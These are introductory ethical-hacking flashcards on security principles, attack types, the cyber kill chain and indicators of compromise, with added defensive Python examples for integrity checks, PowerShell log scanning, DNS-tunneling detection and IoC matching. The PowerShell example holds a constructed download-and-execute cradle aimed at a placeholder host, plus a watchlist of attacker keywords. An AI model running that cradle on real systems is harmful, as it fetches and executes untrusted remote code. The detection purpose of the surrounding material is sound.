Intro to Ethical Hacking Flashcards

1
Q

What this Module Covers

A

Describe the elements of information security

Explain information security attacks and information warfare

Describe cyber kill chain methodology, TTPs, and IoCs

Describe hacking concepts, types, and phases

Explain ethical hacking concepts and scope

Understand information security controls (defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and AI/ML)

Know about the information security acts and laws

2
Q

Module Flow

A
  1. Information Security Overview
  2. Cyber Kill Chain Concepts
  3. Hacking Concepts
  4. Ethical Hacking Concepts
  5. Information Security Controls
  6. Information Security Laws and Standards
3
Q

Five Major Elements of Information Security

A

Confidentiality

Integrity

Availability

Authenticity

Non-Repudiation

4
Q

Confidentiality

A

Information or data is accessible only to authorized users.

5
Q

Integrity

A

Protects data against unauthorized modification (and makes such modification detectable).

6
Q

Availability

A

Assures that the systems responsible for transferring, storing and processing information are accessible when required by authorized parties.

7
Q

Authenticity

A

Ensures that data is genuine: it comes from the claimed source and has not been forged.

The major role of authenticity is to ensure that a user (or message) is genuine.

8
Q

Non-Repudiation

A

A guarantee that the sender of a message cannot later deny having sent it,

and that the recipient cannot deny having received it.

9
Q

Confidentiality Breaches

A

May occur due to improper data handling or a hacking attempt.

10
Q

Confidentiality controls

A

Data classification
Data encryption
Proper disposal of equipment (such as HDDs, USB drives, PCs, RAM, etc.)

11
Q

Measures of integrity

A

Checksum:

A number produced by a mathematical function (typically a cryptographic hash such as SHA-256) that is used to verify that a given block of data has not changed.
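The following is an added example, not part of the original flashcards, showing the checksum idea in working code together with the caveat a practitioner needs: a plain hash only detects accidental or naive changes, because an attacker who can rewrite the data can also rewrite the checksum stored next to it. A keyed checksum (HMAC) closes that gap. The record and the key are constructed for the demo.

```python
import hashlib
import hmac

# Constructed sample record (not from the original flashcards).
ORIGINAL = b"account=4471;amount=250.00;currency=USD"
# Constructed demo key; in practice it comes from a secrets store, never from source code.
DEMO_KEY = b"constructed-demo-key"


def sha256_hex(data: bytes) -> str:
    """Plain checksum: detects accidental corruption or a naive modification."""
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, expected_hex: str) -> bool:
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def hmac_tag(key: bytes, data: bytes) -> str:
    """Keyed checksum (HMAC-SHA256): without the key an attacker cannot produce a valid tag."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_hmac(key: bytes, data: bytes, tag_hex: str) -> bool:
    # compare_digest avoids leaking the tag through timing differences.
    return hmac.compare_digest(hmac_tag(key, data), tag_hex)


def demo() -> dict:
    """Walk through: stored checksum/tag, a tampered copy, and an attacker who recomputes."""
    tampered = ORIGINAL.replace(b"250.00", b"950.00")
    stored_sum = sha256_hex(ORIGINAL)
    stored_tag = hmac_tag(DEMO_KEY, ORIGINAL)
    # An attacker who can rewrite the record can also rewrite the plain checksum next to it.
    forged_sum = sha256_hex(tampered)
    return {
        "original_ok": verify_checksum(ORIGINAL, stored_sum),
        "tampered_detected": not verify_checksum(tampered, stored_sum),
        "plain_checksum_forgeable": verify_checksum(tampered, forged_sum),
        "hmac_original_ok": verify_hmac(DEMO_KEY, ORIGINAL, stored_tag),
        "hmac_tampered_detected": not verify_hmac(DEMO_KEY, tampered, stored_tag),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Note that an HMAC uses a shared key, so it gives integrity and origin authentication but not non-repudiation: either holder of the key could have produced the tag. Non-repudiation requires a digital signature made with a private key that only the signer holds.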

12
Q

Measures of Availability

A

Disk arrays for redundant systems and clustered machines

Antivirus software to combat malware

Distributed denial-of-service (DDoS) prevention systems

13
Q

Authenticity controls

A

Biometrics
Smart cards
Digital certificates

14
Q

Measures of Non-Repudiation

A

Using a digital signature to ensure non-repudiation: the signature is created with the signer's private key, so only the signer could have produced it, and anyone holding the matching public key can verify it.

15
Q

Topics covered in the information security overview

A

Elements of information security
Classification of attacks
Information warfare

16
Q

Attacks

A

Motive(Goal) + Method + Vulnerability

17
Q

Attack Motives

A

Attack motives originate from the targeting of a valuable resource, whether data or an information processing system.

System vulnerabilities allow hackers to attempt an attack using attack techniques (methods).

18
Q

Motives behind information security attacks

A

Disrupting business continuity

Stealing information and manipulating data

Creating fear and chaos by disrupting critical infrastructures

Causing financial loss to the target

Propagating religious or political beliefs

Achieving state military objectives

Damaging the reputation of the target

Taking revenge

Demanding ransom

19
Q

Classification of Attacks

A
Passive Attacks
Active Attacks
Close-in Attacks
Insider Attacks
Distribution Attacks
20
Q

Passive Attacks

A

Intercepting and monitoring network traffic and data flow on the target network

Does not tamper with the data

The attacker performs reconnaissance on network traffic using a sniffer

This kind of attack is difficult to detect because the attacker does not interact with the end user's system

21
Q

Example of passive attacks

A
Sniffing
Eavesdropping
Footprinting
Network traffic analysis
Decryption of weakly encrypted files
22
Q

Active attacks

A

Tamper with data in transit or break into the security system

Penetrate or infect the target's internal network and gain access to a remote system in order to compromise the internal network

23
Q

Example of Active attacks

A

DoS

Man-in-the-Middle

Session hijacking

SQL injection

Firewall and IDS attacks

Bypassing protection mechanisms

Profiling

Malware attacks

Privilege escalation

Backdoor access

Spoofing attacks

Cryptography attacks

Replay attacks

Password-based attacks

XSS attacks

Exploitation of application and OS software

DNS and ARP poisoning

Compromised-key attacks

24
Q

Close-In Attacks

A

The attacker performs the attack while physically close to the target system or network, in order to gather the information needed to carry out the attack.

25
Q

Examples of close-in attacks

A

Social engineering, such as eavesdropping

Shoulder surfing

Dumpster diving

26
Q

Insider Attack

A

Insider attacks involve using privileged access to violate rules

or

to intentionally cause a threat to the organization's information

27
Q

Examples of insider attacks

A
Planting keyloggers
Backdoors
Malware
Eavesdropping
Wiretapping
Theft of physical devices
Data theft and spoliation
Pod slurping
Social engineering
28
Q

Distribution Attacks

A

Tampering with hardware or software prior to installation

29
Q

Examples of Distribution Attacks

A

Modification of software or hardware during production

Modification of software or hardware during distribution

30
Q

Information warfare

A

Refers to the use of ICT (information and communication technologies) to gain a competitive advantage over an opponent

31
Q

Examples of Information Warfare

A
Viruses
Worms
Trojan horses
Logic bombs
Trap doors
Nanomachines
Microbes
Electronic jamming
Penetration exploits and tools
32
Q

Martin Libicki's information warfare categories

A
Command and Control (C2) warfare
Intelligence-based warfare
Electronic warfare
Psychological warfare
Hacker warfare
Economic warfare
Cyberwarfare
33
Q

Command and Control Warfare

A

The impact an attacker possesses over a compromised system

34
Q

Intelligence-based warfare

A

Sensor-based technology that directly corrupts technological systems

35
Q

Electronic Warfare

A

Uses radio-electronic and cryptographic techniques to degrade communication

Radio-electronic techniques attack the physical means of sending information

Cryptographic techniques use bits and bytes to disrupt the means of sending information

36
Q

Psychological Warfare

A

Uses various techniques such as propaganda and terror to demoralize one’s adversary in an attempt to succeed in battle

37
Q

Hacker Warfare

A
The purpose of this warfare can vary: shutdown of systems,
data errors,
theft of information,
theft of services,
system monitoring,
false messaging, and access to data
38
Q

Economic Warfare

A

Can affect the economy of a business or nation by blocking the flow of information

39
Q

Cyberwarfare

A

Use of information systems against the virtual personas of individuals or groups

It is the broadest of all forms of information warfare.

It includes information terrorism, semantic attacks and simula-warfare

40
Q

Information warfare consists of?

A

Defensive and offensive strategies

41
Q

Defensive information warfare

A

Involves all strategies and actions to defend against attacks on ICT assets

Prevention
Deterrence
Alert
Detection
Emergency Preparedness
Response
42
Q

Offensive information warfare

A

Involves attacks against the ICT assets of an opponent

Web Application Attacks
Web server Attacks
Malware Attacks
MITM Attacks
System Hacking
43
Q

Cyber Kill chain concept

A

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization

This model helps organizations understand the various possible threats at every stage of an attack and the countermeasures needed to defend against such attacks.

This model provides security professionals with clear insight into the attack strategy used by the adversary

so that different levels of security controls can be implemented to protect the organization's IT infrastructure

44
Q

Topics covered under the Cyber Kill Chain Methodology

A

Common TTPs
Behavioral identification of adversaries
Indicators of Compromise

45
Q

Cyber Kill Chain Methodology

A

An intelligence-driven defense for the identification and prevention of malicious intrusion activities

Provides greater insight into the attack phases

Helps security professionals understand the adversary's tactics, techniques, and procedures beforehand

46
Q

The cyber kill chain framework was developed for

A

Securing cyberspace, based on the concept of military kill chains (the framework was introduced by Lockheed Martin)

47
Q

The cyber kill chain method aims to

A

Actively enhance intrusion detection and response

The cyber kill chain is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats

48
Q

Understanding cyber kill chain methodology

A

Helps security professionals leverage controls at different stages of an attack, and helps them prevent the attack before it succeeds.

It also provides greater insight into the attack phases, which helps in understanding the adversary's TTPs beforehand

49
Q

The phases of the cyber kill chain methodology

A
Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command and Control
Actions on Objectives
50
Q

Reconnaissance

A

An adversary performs reconnaissance to collect as much information about the target as possible, probing for weak points before actually attacking.

They look for information such as publicly available data about the target.

51
Q

Activities of the adversary during reconnaissance

A

Gathering information about the target organization by searching the internet or through social engineering

Performing analysis of various online activities and publicly available information

Gathering information from social networking sites and web services

Obtaining information about websites visited

Monitoring and analyzing the target organization's website

Performing WHOIS, DNS, and network footprinting

Performing scanning to identify open ports and services

52
Q

Weaponization

A

The adversary analyzes the data collected during reconnaissance to identify the vulnerabilities and techniques that can be exploited to gain unauthorized access to the target.

Based on the vulnerabilities identified, the adversary creates a tailored, deliverable malicious payload.

53
Q

Activities of the adversary during weaponization

A

Identifying an appropriate malware payload based on the analysis

Creating a new malware payload, or selecting, reusing or modifying available malware payloads based on the identified vulnerabilities

Creating a phishing email campaign

Leveraging exploit kits and botnets

54
Q

Delivery

A

The adversary transmits the payload to the target as an

email attachment,
via a malicious link on a website,
through a vulnerable web application, or
on USB drives

56
Q

Why delivery is a key stage

A

It is the stage that measures the effectiveness of the defense strategies implemented by the target organization, based on whether the adversary's intrusion attempt is blocked or not

57
Q

Activities of the adversary during delivery

A

Sending phishing emails to employees of the target organization

Distributing USB drives containing a malicious payload to employees of the target organization

Performing attacks such as watering hole attacks on compromised websites

Using various hacking tools against the operating systems, applications and servers of the target organization

58
Q

Exploitation

A

After the weapon is transmitted to the intended victim, exploitation triggers the adversary's malicious code to exploit a vulnerability in the operating system, application, or server on a target system

59
Q

Threats the victim may face during exploitation

A

Authentication and authorization attacks
Arbitrary code execution
Physical security threats
Security misconfiguration

60
Q

Activities of the adversary during exploitation

A

Exploiting software or hardware vulnerabilities to gain remote access to the target system

61
Q

Installation

A

The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period

After injecting the malicious code, the adversary gains the capability to spread the infection to other systems in the network

To hide the presence of malicious activity from security controls, the adversary uses various techniques such as encryption

62
Q

Activities of the adversary in the installation phase

A

Downloading and installing malicious software such as backdoors

Gaining remote access to the target system

Leveraging various methods to keep the backdoor hidden and running

Maintaining access to the target system

63
Q

Command and control

A

The adversary creates a command and control channel, which establishes two-way communication between the victim's system and an adversary-controlled server to pass data back and forth

64
Q

Activities of the adversary in the C2 phase

A

Establishing a two-way communication channel between the victim's system and adversary-controlled servers

Leveraging channels such as web traffic, email communication, and DNS messages

Applying privilege escalation techniques

Hiding any evidence of compromise using techniques such as encryption

65
Q

Actions on Objectives

A

The adversary controls the victim's system from a remote location and finally accomplishes their intended goals

The adversary gains access to confidential data, disrupts the network, or destroys the capability of the target
by gaining access to the network and compromising more systems

The compromised system is also a launching point for other attacks

66
Q

Tactics, Techniques, and Procedures (TTPs)

A

TTPs refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors.

They are helpful in analyzing threats and profiling threat actors, and can further be used to strengthen the security infrastructure of an organization

67
Q

Tactics

A

A guideline that describes the way an attacker performs their attack from beginning to end

Understanding the tactics used at the different stages of an attack helps in profiling the threat actor

This profile is further helpful in analyzing the techniques and procedures used by the attacker

An attacker may continuously change the TTPs used, so it is important to constantly review and update the tactics attributed to APT groups

68
Q

Techniques

A

To launch an attack successfully, threat actors use several techniques during its execution. These techniques include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration

Therefore, understanding the techniques used in the different phases of an attack is essential to analyzing threat groups effectively.

The techniques at the initial stage mainly describe the tools used for information gathering and initial exploitation

Techniques used in the middle stages of an attack mostly depend on technical tools for escalating privileges on compromised systems or performing lateral movement within the target organization's network

At this stage of an attack, the attackers use various exploits or misuse configuration vulnerabilities on the target systems

The techniques in the last stage of an attack can have both technical and non-technical aspects

The techniques used for data theft are usually based on network technology and encryption

After successfully executing the attack and transferring the files, the attacker follows certain purely technical techniques to cover their tracks. They use automated software tools to clear log files to evade detection

69
Q

Procedures

A

"Procedures" are the sequence of actions performed by threat actors to execute the different steps of an attack life cycle

Procedures are mainly performed to increase the success rate of an attack and decrease the probability of detection by security mechanisms

In the initial stage of an attack, such as during information gathering, observing the procedure of an APT group is difficult. However, the later stages of an attack can leave trails that may be used to understand the procedures the attacker followed

70
Q

Examples of procedures

A

A threat actor collects information about the target organization;

identifies key targets and employees;

collects their contact details;

identifies vulnerable systems and potential entry points to the target network;

and documents all the collected information.

Threat actors also follow procedures when performing spear phishing, monitoring security controls to identify zero-day exploits in the target systems, and other tasks

71
Q

Adversary Behavioral Identification

A

Adversary behavioral identification involves identifying the common methods or techniques followed by an adversary to launch attacks on, or to penetrate, an organization's network

It gives security professionals insight into upcoming threats and exploits

72
Q

Adversary Behaviors

A
Internal reconnaissance
Use of PowerShell
Unspecified proxy activities
Use of command-line interface
HTTP user agent
Command and control server
Use of DNS tunneling
Use of web shell
Data staging
73
Q

Internal Reconnaissance

A

Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance.

This includes the enumeration of systems, hosts and processes, and the execution of various commands to find information such as the local user context, system configuration, hostname, IP address, active remote systems, and programs running on the target systems

74
Q

Identify misuse of PowerShell

A

Check PowerShell transcript logs or Windows event logs (Script Block Logging, Event ID 4104, and Module Logging, Event ID 4103, in the Microsoft-Windows-PowerShell/Operational log). Look for encoded commands (-EncodedCommand), hidden windows, download cradles and execution-policy bypasses.
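The following is an added example, not part of the original flashcards, of the kind of check a defender runs over Script Block Logging data: PowerShell's -EncodedCommand takes the base64 of the UTF-16LE encoded script, so the logged command line has to be decoded before keyword matching is meaningful. The event records and the encoded command are constructed for the demo (the 4104 event ID and field name are real; the events are not captured logs).

```python
import base64
import re

# Constructed sample of what a 4104 ScriptBlockText field might contain (not real logs).
CONSTRUCTED_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
# PowerShell's -EncodedCommand expects base64 over the UTF-16LE bytes of the script.
CONSTRUCTED_B64 = base64.b64encode(CONSTRUCTED_COMMAND.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": f"powershell.exe -nop -w hidden -enc {CONSTRUCTED_B64}"},
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"EventID": 4104, "ScriptBlockText": "powershell.exe -ExecutionPolicy Bypass -File .\\deploy.ps1"},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Constructed watchlist; tune it to your environment.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "frombase64string", "-nop", "hidden", "bypass",
)


def decode_encoded_command(b64: str) -> str:
    """Reverse PowerShell's -EncodedCommand encoding (base64 over UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")


def extract_encoded_commands(text: str) -> list[str]:
    """Return the decoded payload of every -EncodedCommand (or prefix) flag in text."""
    decoded = []
    for flag, payload in _ENC_FLAG.findall(text):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy is not an encoded-command flag
        try:
            decoded.append(decode_encoded_command(payload))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16LE; leave it to the other checks
    return decoded


def suspicious_tokens(text: str) -> list[str]:
    lowered = text.lower()
    return [tok for tok in SUSPICIOUS_TOKENS if tok in lowered]


def analyze_events(events: list[dict]) -> list[dict]:
    """Flag 4104 events whose visible or decoded script text matches the watchlist."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev["ScriptBlockText"]
        decoded = extract_encoded_commands(text)
        tokens = set(suspicious_tokens(text))
        for script in decoded:
            tokens.update(suspicious_tokens(script))
        if tokens:
            findings.append({"script": text[:60], "decoded": decoded, "tokens": sorted(tokens)})
    return findings


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding)
```

Keyword matching on the raw field alone would miss the first event entirely; only after decoding does the download cradle (IEX ... DownloadString) become visible.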

75
Q

Unspecified Proxy Activities

A

An adversary can create and configure multiple domains pointing to the same host, allowing them to switch quickly between domains to avoid detection

76
Q

Use of Command Line Interface

A

The adversary can use the command-line interface to browse files, read file contents, modify file contents, create new accounts, etc.

77
Q

Use of DNS tunneling

A

The adversary uses DNS tunneling to hide malicious traffic (C2 or exfiltrated data encoded in query names) within the legitimate traffic carried by common protocols used in the network.
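The following is an added example, not part of the original flashcards, of the heuristics a defender applies to DNS logs to surface tunneling: tunneled data shows up as long, high-entropy subdomain labels, many unique subdomains under one zone, and record types (TXT, NULL) that carry more payload than A records. The query log is constructed, and the zone split on the last two labels is a simplifying assumption (a production tool would use the Public Suffix List).

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log as (client, qtype, qname). Not captured from a real network.
SAMPLE_QUERIES = [
    ("10.0.0.12", "A", "www.example.com"),
    ("10.0.0.12", "A", "mail.example.com"),
    ("10.0.0.12", "AAAA", "cdn.example.net"),
    ("10.0.0.23", "TXT", "7a3f9c1e4b8d2a6f0c5e9b1d3a7f2c8e.t.exfil-demo.test"),
    ("10.0.0.23", "TXT", "d4e8a1c7f2b9e3a6c0d5f8b2e7a1c4d9.t.exfil-demo.test"),
    ("10.0.0.23", "TXT", "b9c2e7a4d1f8c3e6a0b5d9f2c7e1a4b8.t.exfil-demo.test"),
    ("10.0.0.23", "TXT", "e1f4a7c0d3b6e9a2c5f8b1d4e7a0c3f6.t.exfil-demo.test"),
]


def shannon_entropy(s: str) -> float:
    """Bits per character; hex/base32 payload labels score near 4-5, real words near 2-3."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Naive zone split on the last two labels (assumption: use the Public Suffix List in production)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_query(qname: str, qtype: str) -> int:
    """0-3: long label, high-entropy label, payload-friendly record type."""
    labels = qname.rstrip(".").lower().split(".")
    zone_labels = len(registered_domain(qname).split("."))
    sub_labels = labels[:-zone_labels]
    score = 0
    if sub_labels:
        longest = max(sub_labels, key=len)
        if len(longest) >= 20:
            score += 1
        if shannon_entropy(longest) >= 3.0:
            score += 1
    if qtype.upper() in ("TXT", "NULL"):
        score += 1
    return score


def find_tunneling(queries, min_unique: int = 3, min_mean_score: float = 2.0) -> list[dict]:
    """Aggregate per (client, zone); flag zones with many unique, high-scoring subdomains."""
    per_zone = defaultdict(lambda: {"subdomains": set(), "scores": []})
    for client, qtype, qname in queries:
        zone = registered_domain(qname)
        sub = qname.rstrip(".").lower()[: -len(zone)].rstrip(".")
        per_zone[(client, zone)]["subdomains"].add(sub)
        per_zone[(client, zone)]["scores"].append(score_query(qname, qtype))
    findings = []
    for (client, zone), stats in per_zone.items():
        mean = sum(stats["scores"]) / len(stats["scores"])
        if len(stats["subdomains"]) >= min_unique and mean >= min_mean_score:
            findings.append({"client": client, "zone": zone,
                             "unique_subdomains": len(stats["subdomains"]),
                             "mean_score": round(mean, 2)})
    return findings


if __name__ == "__main__":
    for finding in find_tunneling(SAMPLE_QUERIES):
        print(finding)
```

The thresholds are starting points: content delivery networks and some security products also generate long, random-looking labels, so allow-listing known zones before scoring keeps the false-positive rate workable.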

78
Q

Use of Web shell

A

The adversary uses a web shell to manipulate the web server by creating a shell within a website

79
Q

Data Staging

A

After successfully penetrating a target's network, the adversary uses data staging techniques to collect and combine as much data as possible

The collected data may then be exfiltrated or destroyed by the adversary

80
Q

Indicators of Compromise (IoCs)

A

IoCs are the clues, artifacts and pieces of forensic data found on the network or operating systems of an organization that indicate a potential intrusion or malicious activity in the organization's infrastructure

IoCs are data fed into the intelligence process

Performing frequent IoC scans helps to effectively and efficiently detect and respond to evolving cyber threats

81
Q

IoCs are classified as

A

Atomic indicators
Computed indicators
Behavioral indicators

82
Q

Atomic indicators

A

Indicators that cannot be segmented into smaller parts and whose meaning does not change in the context of an intrusion

e.g. IP addresses and email addresses

83
Q

Computed Indicators

A

Indicators derived from data extracted from a security incident

e.g. hash values and regular expressions

84
Q

Behavioral Indicators

A

A grouping of both atomic and computed indicators, combined on the basis of some logic (for example, a sequence or count of events)

85
Q

IoC Categories

A

Email Indicators
Network Indicators
Host-based Indicators
Behavioral Indicators

86
Q

Email Indicators (IoC)

A

Indicates an attack that uses the email service to send malicious data to the target

The indicator provides:
the sender's email address,
the email subject,
attachments and links

87
Q

Network Indicators

A

Used to indicate network-based attacks such as C2 and malware delivery, and to identify the OS, browser type and system information involved

Network indicators provide:
URLs, domain names and IP addresses

88
Q

Host-Based Indicators

A

Used to perform analysis of infected systems within the organizational network

Host-based indicators provide filenames, file hashes, registry keys, DLLs and mutexes

89
Q

Behavioral Indicators

A

Used to identify specific behavior related to malicious activities, such as

code injection into memory
an application running a script

90
Q

Key Indicators of Compromise

A

Unusual outbound network traffic

Unusual activity through a privileged user account

Geographical anomalies

Multiple login failures

Increased database read volume

Large HTML response size

Multiple requests for the same file

Mismatched port-application traffic

Suspicious registry or system file changes

Unusual DNS requests

Unexpected patching of systems

Signs of distributed denial-of-service activity

Bundles of data in the wrong places

Web traffic with superhuman behavior
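The following is an added example, not part of the original flashcards, that turns the three IoC types (atomic, computed, behavioral) and the "multiple login failures" key indicator into one small matcher over constructed events: atomic indicators are compared literally, computed indicators are a file hash and a user-agent regex recomputed from the evidence, and the behavioral indicator is built from a count of failures followed by a success from the same source within a time window. All indicator values, the file body and the event records are constructed; the IPs are documentation ranges.

```python
import hashlib
import re
from collections import defaultdict

# Atomic indicators (constructed; not from any real threat feed).
ATOMIC_IPS = {"203.0.113.45"}
ATOMIC_EMAILS = {"invoice@mail-example.test"}

# Computed indicators: a SHA-256 of a constructed file body and a regex over a user agent.
BAD_FILE_BODY = b"constructed dropper body, not real malware"
BAD_SHA256 = hashlib.sha256(BAD_FILE_BODY).hexdigest()
UA_PATTERN = re.compile(r"demo-agent/\d+\.\d+")  # constructed tool signature

# Constructed event stream: authentication, email, HTTP and file events.
SAMPLE_EVENTS = [
    {"type": "auth", "ts": 100, "src": "198.51.100.7", "user": "jdoe", "result": "fail"},
    {"type": "auth", "ts": 105, "src": "198.51.100.7", "user": "jdoe", "result": "fail"},
    {"type": "auth", "ts": 110, "src": "198.51.100.7", "user": "jdoe", "result": "fail"},
    {"type": "auth", "ts": 115, "src": "198.51.100.7", "user": "jdoe", "result": "fail"},
    {"type": "auth", "ts": 120, "src": "198.51.100.7", "user": "jdoe", "result": "fail"},
    {"type": "auth", "ts": 140, "src": "198.51.100.7", "user": "jdoe", "result": "success"},
    {"type": "auth", "ts": 300, "src": "10.0.0.5", "user": "asmith", "result": "fail"},
    {"type": "auth", "ts": 360, "src": "10.0.0.5", "user": "asmith", "result": "success"},
    {"type": "email", "ts": 200, "from": "invoice@mail-example.test", "subject": "Invoice 4471"},
    {"type": "http", "ts": 210, "dst": "203.0.113.45", "ua": "Mozilla/5.0 (compatible; demo-agent/1.2)"},
    {"type": "file", "ts": 220, "path": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\inv.exe", "body": BAD_FILE_BODY},
    {"type": "file", "ts": 230, "path": "C:\\Users\\jdoe\\Documents\\readme.txt", "body": b"hello"},
]


def match_atomic(ev: dict) -> list[str]:
    """Literal comparison against atomic indicators (IPs, email addresses)."""
    hits = []
    for field in ("src", "dst"):
        if ev.get(field) in ATOMIC_IPS:
            hits.append(f"ip:{ev[field]}")
    if ev.get("from", "").lower() in ATOMIC_EMAILS:
        hits.append(f"email:{ev['from']}")
    return hits


def match_computed(ev: dict) -> list[str]:
    """Indicators that must be computed from the evidence: hashes and regular expressions."""
    hits = []
    if "body" in ev and hashlib.sha256(ev["body"]).hexdigest() == BAD_SHA256:
        hits.append(f"sha256:{BAD_SHA256[:12]}")
    if "ua" in ev and UA_PATTERN.search(ev["ua"]):
        hits.append(f"ua:{ev['ua']}")
    return hits


def match_behavioral(events: list[dict], threshold: int = 5, window: int = 120) -> list[dict]:
    """Behavioral indicator: >= threshold failed logins from one source, then a success within window."""
    fails = defaultdict(list)
    findings = []
    auth = sorted((e for e in events if e["type"] == "auth"), key=lambda e: e["ts"])
    for ev in auth:
        if ev["result"] == "fail":
            fails[ev["src"]].append(ev["ts"])
        elif ev["result"] == "success":
            recent = [t for t in fails[ev["src"]] if ev["ts"] - t <= window]
            if len(recent) >= threshold:
                findings.append({"src": ev["src"], "user": ev["user"],
                                 "failures": len(recent), "ts": ev["ts"]})
    return findings


def scan(events: list[dict]) -> dict:
    report = {"atomic": [], "computed": [], "behavioral": match_behavioral(events)}
    for ev in events:
        report["atomic"].extend((ev["ts"], h) for h in match_atomic(ev))
        report["computed"].extend((ev["ts"], h) for h in match_computed(ev))
    return report


if __name__ == "__main__":
    for kind, hits in scan(SAMPLE_EVENTS).items():
        print(kind, hits)
```

The behavioral rule is the one that survives attacker changes: rotating an IP defeats the atomic match and recompiling the dropper defeats the hash, but a password-spraying actor still has to fail repeatedly before succeeding.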